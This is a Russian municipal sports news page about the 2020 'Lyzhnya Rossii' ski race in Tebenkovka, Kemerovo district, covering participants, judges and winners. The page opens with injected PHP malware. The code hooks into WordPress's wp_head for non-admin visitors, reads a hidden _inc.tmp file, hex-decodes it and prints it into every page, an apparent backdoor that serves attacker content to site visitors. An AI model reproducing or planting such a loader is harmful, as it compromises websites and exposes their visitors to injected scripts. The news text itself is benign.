if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } В д. Тебеньковка состоялся муниципальный этап всероссийской гонки «Лыжня России-2020» — МБУ "ЦФК и С"

В д. Тебеньковка состоялся муниципальный этап всероссийской гонки «Лыжня России-2020»

В д. Тебеньковка состоялся муниципальный этап всероссийской гонки «Лыжня России-2020»

8 февраля 2020 г. в д. Тебеньковка, Кемеровского муниципального округа, состоялся муниципальный этап 38-ой всероссийской массовой гонки «Лыжня России-2020». В этом году в соревнованиях приняли участие порядка 100 человек, также на стадионе присутствовали болельщики. На старт вышли профессиональные спортсмены, ветераны, любители активного образа жизни, школьники.

 С приветственным словом выступила глава Кемеровского муниципального округа Коляденко Марина Вениаминовна.

В программе соревнований был бег на дистанции 2 км и 3 км, в зависимости от возраста участника, а также самый зрелищный вид — массовый старт на 2 км.

Главным судьёй соревнований стал мастер спорта РФ по лыжным гонкам, судья 1 категории Станислав Валерьевич Вяткин, главным секретарём — Шляхова Дарья Петровна.

Завершилось мероприятие церемонией награждения, в ходе которой призерам и победителям лыжной гонки были вручены памятные дипломы и медали. Не остались без внимания и самый опытный участник гонки — Петрова Анна (72 года) и самый юный — Волнычев Вадим (7 лет), они также получили призы и подарки.

В категории «девушки 2004 года и младше» лучшей стала Шулева Юлия, в категории «девушки 2003 и старше» перовое место у Набатниковой Юлии, в категории «юноши 2004 и младше» первое место — Андреев Максим,

в категории «мужчины 2003 и старше» победителем стал Румянцев Сергей.

Для всех спортсменов и всех желающих была организована полевая кухня, культурно-развлекательная программа с участием артистов Кемеровского округа. Для создания праздничного настроения на территории лыжного стадиона звучала спортивная энергичная музыка и песни. Для детей была организована игровая площадка.

          «Лыжня России» — настоящий праздник спорта, не только для профессионалов, но и для всех любителей зимнего спорта. Участники и болельщики получили заряд бодрого и праздничного настроения.

Оригинал статьи на https://uksimp-akmr.ru/novosti/?id=1581387057

Наверх